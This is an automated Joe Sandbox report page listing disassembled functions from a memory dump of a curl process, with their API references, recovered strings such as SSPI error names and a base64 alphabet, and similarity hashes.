Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SECPKG_NOT_FOUND
API String ID: 1435330505-2788034027
Opcode ID: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
Instruction ID: e03095c43da7714ec7581abc3aab3e68c44a90d6b7c215f425152c8c717e7ba8
Opcode Fuzzy Hash: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
Instruction Fuzzy Hash: FC112A36A15B40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EED9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_TOO_MANY_PRINCIPALS, xrefs: 000000013F31EED9
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TOO_MANY_PRINCIPALS
API String ID: 1435330505-1024473768
Opcode ID: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
Instruction ID: 5f3a24153eb22f09c7bd3d596357b760ad452080320ec7458c4ef9bddb622b3c
Opcode Fuzzy Hash: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
Instruction Fuzzy Hash: 9C112736A15A40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EEC1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_TARGET_UNKNOWN, xrefs: 000000013F31EEC1
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TARGET_UNKNOWN
API String ID: 1435330505-2019469157
Opcode ID: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
Instruction ID: 5541421efdb3c511d59a2c15f08df7f1012a480715b0c5718791a93810af2e11
Opcode Fuzzy Hash: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
Instruction Fuzzy Hash: 70112A36A15A40D6E661EF20E4047DD6365F788B81F85413ADA8E42B95DF3CCA8BC750

Function 000000013F31EECD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_TIME_SKEW, xrefs: 000000013F31EECD
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TIME_SKEW
API String ID: 1435330505-867874831
Opcode ID: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
Instruction ID: 83a49e56056d4a56b25868c4b3a26b17cd0cce7d339109fefc28f96a0ac3fb73
Opcode Fuzzy Hash: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
Instruction Fuzzy Hash: 7F112736A15B40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EEB5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 000000013F31EEB5
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
API String ID: 1435330505-2827815589
Opcode ID: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
Instruction ID: 226f4e74d88b0599b5eaa1ce4b7fdef5908bef1ff73e08930e8d140c54d59aaa
Opcode Fuzzy Hash: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
Instruction Fuzzy Hash: AF112736A15A40D6E6A1EF20E4047DD7365F788B81F81513ADA8E42B96DF3CCA8BC750

Function 000000013F31EEA9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 000000013F31EEA9
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_LOGON_REQUIRED
API String ID: 1435330505-530148132
Opcode ID: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
Instruction ID: 882044920ef2425ce24faf27e04dbd6873aeeedb0e4cde158096ad3a1cdcf520
Opcode Fuzzy Hash: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
Instruction Fuzzy Hash: C1112A36A15A40D6E661EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31ED11 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_INVALID_TOKEN, xrefs: 000000013F31ED11
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_TOKEN
API String ID: 1435330505-3630042646
Opcode ID: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
Instruction ID: dc9c5b8eab29f45084c1c5c87d638d63741a6492ecc37ecd4ecdf1cb69331033
Opcode Fuzzy Hash: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
Instruction Fuzzy Hash: A8112736A15A40D6E6A1EF20E4447DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31ED1D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 000000013F31ED1D
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED
API String ID: 1435330505-2125857805
Opcode ID: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
Instruction ID: 0ec5d8ab6e7231287d61e35c66dbeda250ceca9425f37df199c49c966ee6fc62
Opcode Fuzzy Hash: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
Instruction Fuzzy Hash: D3112736A15A40D6E6A1EF20E4047DD6365F788B81F85413ADA8E42B96DF3CCA8BC750

Function 000000013F31ED05 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_INVALID_PARAMETER, xrefs: 000000013F31ED05
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_PARAMETER
API String ID: 1435330505-1537070967
Opcode ID: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
Instruction ID: 45df69952c630f23899dc1c229b411c4a714f642d26f025b1dbad268bfb62144
Opcode Fuzzy Hash: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
Instruction Fuzzy Hash: E0112A36A15A40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31ECF9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_INVALID_HANDLE, xrefs: 000000013F31ECF9
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_HANDLE
API String ID: 1435330505-4021695947
Opcode ID: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
Instruction ID: 19e1ca08aa29ddcfea741822dcf815e183ec32284da063613c4c9ed1871937e5
Opcode Fuzzy Hash: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
Instruction Fuzzy Hash: 23112736A15A40D6E6A1EF20E4047DD6365F788B81F81513ADA8E42B96DF3CCA8BC750

Function 000000013F31ECE1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_INSUFFICIENT_MEMORY, xrefs: 000000013F31ECE1
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INSUFFICIENT_MEMORY
API String ID: 1435330505-672193982
Opcode ID: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
Instruction ID: e946d921bfac52b797821cb1a081241354adc82a0a926e14ca5d128069bbfbbe
Opcode Fuzzy Hash: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
Instruction Fuzzy Hash: B9112A36A15A40D6E6A5EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F30FADC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F30FB66
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30FBA2
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F30FBC1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30FC60
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30FC88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30FC98

Strings

|<>"?*, xrefs: 000000013F30FBF9
://, xrefs: 000000013F30FAFC

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$_strdupmallocstrncpy
String ID: ://$|<>"?*
API String ID: 985501230-1792949323
Opcode ID: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
Instruction ID: a8aca78b1403d3f0bea10d9c1d2ec44724ece561a00b629f57602d47bef7727a
Opcode Fuzzy Hash: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
Instruction Fuzzy Hash: 5D51BF72A06B8295FA62DF75B5643E977A0F745B90F08453A8E5B077D1EA3CC643C700

Function 000000013F34F794 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F34F8D7
__swprintf_l.LIBCMT ref: 000000013F34F901

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 000000013F34F81F
%c%c%c=, xrefs: 000000013F34F8EF
Basic, xrefs: 000000013F34F7A7
%c%c==, xrefs: 000000013F34F910
%c%c%c%c, xrefs: 000000013F34F8C5

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$Basic
API String ID: 1488884202-1210452188
Opcode ID: 008efc61a97ca77bf298cc08f0642dcc73de89d7e4509fc76e16cc736a0706e8
Instruction ID: 2a9bccb8df56bb93583e1d3787f3b6ae7c58471219f286eccaf5930e845b4a51
Opcode Fuzzy Hash: 008efc61a97ca77bf298cc08f0642dcc73de89d7e4509fc76e16cc736a0706e8
Instruction Fuzzy Hash: AA41C27AA086808AEB15DB35A5543FEBBE1F345794F084629DF9A47796D73CC206CB00

